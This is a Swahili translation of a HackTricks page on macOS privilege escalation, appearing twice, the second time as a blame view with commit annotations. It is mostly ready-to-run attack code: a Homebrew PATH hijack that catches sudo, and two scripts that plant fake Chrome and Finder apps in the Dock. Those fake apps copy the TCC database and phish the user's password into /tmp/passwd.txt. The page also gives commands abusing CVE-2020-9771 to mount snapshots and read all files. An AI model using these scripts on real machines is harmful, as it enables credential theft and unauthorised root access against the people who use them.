hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md

# Kuongeza Mamlaka kwenye macOS

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

## Kuongeza Mamlaka kwenye TCC

Ikiwa umekuja hapa ukitafuta kuongeza mamlaka kwenye TCC, nenda:

{% content-ref url="macos-security-protections/macos-tcc/" %}
[macos-tcc](macos-security-protections/macos-tcc/)
{% endcontent-ref %}

## Kuongeza Mamlaka kwenye Linux

Tafadhali kumbuka kuwa **triki nyingi za kuongeza mamlaka zinazoathiri Linux/Unix pia zitaathiri mashine za MacOS**. Kwa hivyo angalia:

{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation](../../linux-hardening/privilege-escalation/)
{% endcontent-ref %}

## Mwingiliano wa Mtumiaji

### Kuteka Sudo

Unaweza kupata [tekneki ya Kuteka Sudo asili ndani ya chapisho la Kuongeza Mamlaka kwenye Linux](../../linux-hardening/privilege-escalation/#sudo-hijacking).

Walakini, macOS **inahifadhi** **`PATH`** ya mtumiaji wakati anatekeleza **`sudo`**. Hii inamaanisha kuwa njia nyingine ya kufanikisha shambulio hili ni **kuteka programu nyingine** ambazo muathiriwa atatekeleza wakati anapokimbia sudo:
```bash
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls <<EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls

# victim
sudo ls
```
Tafadhali kumbuka kuwa mtumiaji anayetumia terminali huenda akawa na **Homebrew imewekwa**. Kwa hivyo ni rahisi kuchukua udhibiti wa programu katika **`/opt/homebrew/bin`**.

### Udanganyifu wa Dock

Kwa kutumia **uhandisi wa kijamii**, unaweza **kujifanya kuwa Google Chrome** ndani ya dock na kisha kutekeleza script yako mwenyewe:

{% tabs %}
{% tab title="Udanganyifu wa Chrome" %}
Baadhi ya mapendekezo:

* Angalia kwenye Dock ikiwa kuna Chrome, na kesi hiyo **ondoa** kuingia hiyo na **ongeza** **kuingia bandia ya Chrome katika nafasi ile ile** katika safu ya Dock.&#x20;
```bash
#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
```
{% endtab %}

{% tab title="Uwakilishi wa Finder" %}
Mapendekezo kadhaa:

* Hauwezi kuondoa Finder kutoka Dock, kwa hivyo ikiwa utaongeza kwenye Dock, unaweza kuweka Finder bandia karibu na halisi. Kwa hili, unahitaji kuongeza kuingia ya Finder bandia mwanzoni mwa safu ya Dock.
* Chaguo lingine ni kutokuweka kwenye Dock na tu kuifungua, "Finder inayouliza kudhibiti Finder" sio jambo la kushangaza sana.
* Chaguo lingine la kuongeza mamlaka hadi kwa mizizi bila kuuliza nenosiri na sanduku baya, ni kufanya Finder kuomba kweli nenosiri kufanya kitendo cha mamlaka:
* Uliza Finder kuiga faili mpya ya sudo kwenye **`/etc/pam.d`** (Ujumbe unaouliza nenosiri utaonyesha "Finder anataka kuiga sudo")
* Uliza Finder kuiga Plugin mpya ya Uthibitishaji (Unaweza kudhibiti jina la faili ili ujumbe unaouliza nenosiri uonyeshe "Finder anataka kuiga Finder.bundle")
```bash
#!/bin/sh

# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';

rm -rf /tmp/Finder.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources

# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c

chmod +x /tmp/Finder.app/Contents/MacOS/Finder

# Info.plist
cat << EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Finder</string>
<key>CFBundleIdentifier</key>
<string>com.apple.finder</string>
<key>CFBundleName</key>
<string>Finder</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
```
{% endtab %}
{% endtabs %}

## TCC - Kuongeza Uteuzi wa Mamlaka

### CVE-2020-9771 - mount\_apfs TCC kuvuka na kuongeza mamlaka

**Mtumiaji yeyote** (hata wasio na mamlaka) wanaweza kuunda na kufunga nakala ya wakati wa mashine na **kupata faili ZOTE** za nakala hiyo.\
**Mamlaka pekee** inayohitajika ni kwa programu iliyotumiwa (kama `Terminal`) kuwa na **Ufikiaji Kamili wa Diski** (FDA) (`kTCCServiceSystemPolicyAllfiles`) ambayo inahitaji kupewa na msimamizi. 

{% code overflow="wrap" %}
```bash
# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work
```
{% endcode %}

Maelezo zaidi yanaweza [**kupatikana katika ripoti ya awali**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**

## Taarifa Zenye Hisia

Hii inaweza kuwa na manufaa katika kuongeza mamlaka:

{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
{% endcontent-ref %}

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated to Swahili 2024-02-11 02:13:58 +00:00			`# Kuongeza Mamlaka kwenye macOS`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2024-01-04 10:09:21 +01:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [The PEASS Family](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`</details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Kuongeza Mamlaka kwenye TCC`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Ikiwa umekuja hapa ukitafuta kuongeza mamlaka kwenye TCC, nenda:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% content-ref url="macos-security-protections/macos-tcc/" %}`
			`[macos-tcc](macos-security-protections/macos-tcc/)`
			`{% endcontent-ref %}`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Kuongeza Mamlaka kwenye Linux`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Tafadhali kumbuka kuwa triki nyingi za kuongeza mamlaka zinazoathiri Linux/Unix pia zitaathiri mashine za MacOS. Kwa hivyo angalia:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% content-ref url="../../linux-hardening/privilege-escalation/" %}`
			`[privilege-escalation](../../linux-hardening/privilege-escalation/)`
			`{% endcontent-ref %}`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Mwingiliano wa Mtumiaji`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kuteka Sudo`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Unaweza kupata [tekneki ya Kuteka Sudo asili ndani ya chapisho la Kuongeza Mamlaka kwenye Linux](../../linux-hardening/privilege-escalation/#sudo-hijacking).`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			Walakini, macOS inahifadhi `PATH` ya mtumiaji wakati anatekeleza `sudo`. Hii inamaanisha kuwa njia nyingine ya kufanikisha shambulio hili ni kuteka programu nyingine ambazo muathiriwa atatekeleza wakati anapokimbia sudo:
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			```bash
			`# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH`
			`cat > /opt/homebrew/bin/ls <<EOF`
			`#!/bin/bash`
			`if [ "\$(id -u)" -eq 0 ]; then`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`whoami > /tmp/privesc`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`fi`
			`/bin/ls "\$@"`
			`EOF`
			`chmod +x /opt/homebrew/bin/ls`

			`# victim`
			`sudo ls`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			Tafadhali kumbuka kuwa mtumiaji anayetumia terminali huenda akawa na Homebrew imewekwa. Kwa hivyo ni rahisi kuchukua udhibiti wa programu katika `/opt/homebrew/bin`.
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Udanganyifu wa Dock`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Kwa kutumia uhandisi wa kijamii, unaweza kujifanya kuwa Google Chrome ndani ya dock na kisha kutekeleza script yako mwenyewe:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% tabs %}`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`{% tab title="Udanganyifu wa Chrome" %}`
			`Baadhi ya mapendekezo:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Angalia kwenye Dock ikiwa kuna Chrome, na kesi hiyo ondoa kuingia hiyo na ongeza kuingia bandia ya Chrome katika nafasi ile ile katika safu ya Dock. `
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			```bash
			`#!/bin/sh`

			`# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)`
			`# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';`

			`rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null`

			`# Create App structure`
			`mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS`
			`mkdir -p /tmp/Google\ Chrome.app/Contents/Resources`

			`# Payload to execute`
			`cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF`
			`#include <stdio.h>`
			`#include <stdlib.h>`
			`#include <unistd.h>`

			`int main() {`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`char *cmd = "open /Applications/Google\\\\ Chrome.app & "`
			`"sleep 2; "`
			`"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "`
			`"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "`
			`"echo \$PASSWORD > /tmp/passwd.txt";`
			`system(cmd);`
			`return 0;`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`}`
			`EOF`

			`gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome`
			`rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c`

			`chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome`

			`# Info.plist`
			`cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist`
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"`
			`"http://www.apple.com/DTDs/PropertyList-1.0.dtd">`
			`<plist version="1.0">`
			`<dict>`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`<key>CFBundleExecutable</key>`
			`<string>Google Chrome</string>`
			`<key>CFBundleIdentifier</key>`
			`<string>com.google.Chrome</string>`
			`<key>CFBundleName</key>`
			`<string>Google Chrome</string>`
			`<key>CFBundleVersion</key>`
			`<string>1.0</string>`
			`<key>CFBundleShortVersionString</key>`
			`<string>1.0</string>`
			`<key>CFBundleInfoDictionaryVersion</key>`
			`<string>6.0</string>`
			`<key>CFBundlePackageType</key>`
			`<string>APPL</string>`
			`<key>CFBundleIconFile</key>`
			`<string>app</string>`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`</dict>`
			`</plist>`
			`EOF`

			`# Copy icon from Google Chrome`
			`cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns`

			`# Add to Dock`
			`defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'`
			`sleep 0.1`
			`killall Dock`
			```
			`{% endtab %}`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`{% tab title="Uwakilishi wa Finder" %}`
			`Mapendekezo kadhaa:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Hauwezi kuondoa Finder kutoka Dock, kwa hivyo ikiwa utaongeza kwenye Dock, unaweza kuweka Finder bandia karibu na halisi. Kwa hili, unahitaji kuongeza kuingia ya Finder bandia mwanzoni mwa safu ya Dock.`
			`* Chaguo lingine ni kutokuweka kwenye Dock na tu kuifungua, "Finder inayouliza kudhibiti Finder" sio jambo la kushangaza sana.`
			`* Chaguo lingine la kuongeza mamlaka hadi kwa mizizi bila kuuliza nenosiri na sanduku baya, ni kufanya Finder kuomba kweli nenosiri kufanya kitendo cha mamlaka:`
			* Uliza Finder kuiga faili mpya ya sudo kwenye `/etc/pam.d` (Ujumbe unaouliza nenosiri utaonyesha "Finder anataka kuiga sudo")
			`* Uliza Finder kuiga Plugin mpya ya Uthibitishaji (Unaweza kudhibiti jina la faili ili ujumbe unaouliza nenosiri uonyeshe "Finder anataka kuiga Finder.bundle")`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			```bash
			`#!/bin/sh`

			`# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)`
			`# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';`

			`rm -rf /tmp/Finder.app/ 2>/dev/null`

			`# Create App structure`
			`mkdir -p /tmp/Finder.app/Contents/MacOS`
			`mkdir -p /tmp/Finder.app/Contents/Resources`

			`# Payload to execute`
			`cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF`
			`#include <stdio.h>`
			`#include <stdlib.h>`
			`#include <unistd.h>`

			`int main() {`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`char *cmd = "open /System/Library/CoreServices/Finder.app & "`
			`"sleep 2; "`
			`"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "`
			`"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "`
			`"echo \$PASSWORD > /tmp/passwd.txt";`
			`system(cmd);`
			`return 0;`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`}`
			`EOF`

			`gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder`
			`rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c`

			`chmod +x /tmp/Finder.app/Contents/MacOS/Finder`

			`# Info.plist`
			`cat << EOF > /tmp/Finder.app/Contents/Info.plist`
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"`
			`"http://www.apple.com/DTDs/PropertyList-1.0.dtd">`
			`<plist version="1.0">`
			`<dict>`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`<key>CFBundleExecutable</key>`
			`<string>Finder</string>`
			`<key>CFBundleIdentifier</key>`
			`<string>com.apple.finder</string>`
			`<key>CFBundleName</key>`
			`<string>Finder</string>`
			`<key>CFBundleVersion</key>`
			`<string>1.0</string>`
			`<key>CFBundleShortVersionString</key>`
			`<string>1.0</string>`
			`<key>CFBundleInfoDictionaryVersion</key>`
			`<string>6.0</string>`
			`<key>CFBundlePackageType</key>`
			`<string>APPL</string>`
			`<key>CFBundleIconFile</key>`
			`<string>app</string>`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00			`</dict>`
			`</plist>`
			`EOF`

			`# Copy icon from Finder`
			`cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns`

			`# Add to Dock`
			`defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'`
			`sleep 0.1`
			`killall Dock`
			```
			`{% endtab %}`
			`{% endtabs %}`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## TCC - Kuongeza Uteuzi wa Mamlaka`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### CVE-2020-9771 - mount\_apfs TCC kuvuka na kuongeza mamlaka`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Mtumiaji yeyote (hata wasio na mamlaka) wanaweza kuunda na kufunga nakala ya wakati wa mashine na kupata faili ZOTE za nakala hiyo.\`
			Mamlaka pekee inayohitajika ni kwa programu iliyotumiwa (kama `Terminal`) kuwa na Ufikiaji Kamili wa Diski (FDA) (`kTCCServiceSystemPolicyAllfiles`) ambayo inahitaji kupewa na msimamizi.
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% code overflow="wrap" %}`
			```bash
			`# Create snapshot`
			`tmutil localsnapshot`

			`# List snapshots`
			`tmutil listlocalsnapshots /`
			`Snapshots for disk /:`
			`com.apple.TimeMachine.2023-05-29-001751.local`

			`# Generate folder to mount it`
			`cd /tmp # I didn it from this folder`
			`mkdir /tmp/snap`

			`# Mount it, "noowners" will mount the folder so the current user can access everything`
			`/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap`

			`# Access it`
			`ls /tmp/snap/Users/admin_user # This will work`
			```
			`{% endcode %}`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`Maelezo zaidi yanaweza [kupatikana katika ripoti ya awali](https://theevilbit.github.io/posts/cve\_2020\_9771/).`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Taarifa Zenye Hisia`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Hii inaweza kuwa na manufaa katika kuongeza mamlaka:`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
			`{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}`
			`[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)`
			`{% endcontent-ref %}`

			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GITBOOK-4199: change request with no subject merged in GitBook 2023-12-20 02:14:11 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2024-01-04 10:09:21 +01:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako ikionekana katika HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [The PEASS Family](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
